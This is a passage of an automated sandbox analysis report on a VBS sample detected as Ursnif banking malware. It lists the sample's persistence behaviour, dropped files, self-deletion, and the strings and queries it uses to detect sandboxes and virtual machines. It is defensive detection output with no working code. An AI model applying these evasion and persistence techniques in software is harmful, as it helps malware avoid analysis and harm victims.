Source: C:\Windows\System32\control.exe Code function: 37_2_00565699 push 3B000001h; retf 37_2_0056569E

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\a11zr31h.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Greenbelt.iso Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\x0s3qhtp.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Greenbelt.iso Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3596, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\my_presentation_96642.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.431652594.0000020D1DD68000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.414919267.0000020D1DD64000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1386
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a11zr31h.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\x0s3qhtp.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Greenbelt.iso Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 5960 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: explorer.exe, 00000024.00000000.659329221.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: wscript.exe, 00000000.00000002.438287245.0000020D23320000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.660611050.0000000007F40000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000024.00000000.659425273.0000000007C3C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00$
Source: explorer.exe, 00000024.00000000.659194029.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.659425273.0000000007C3C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0s_
Source: explorer.exe, 00000024.00000000.650273069.00000000044B1000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lo
Source: explorer.exe, 00000024.00000000.659329221.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000024.00000000.659194029.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}T7
Source: wscript.exe, 00000000.00000002.438287245.0000020D23320000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.660611050.0000000007F40000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.438287245.0000020D23320000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.660611050.0000000007F40000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
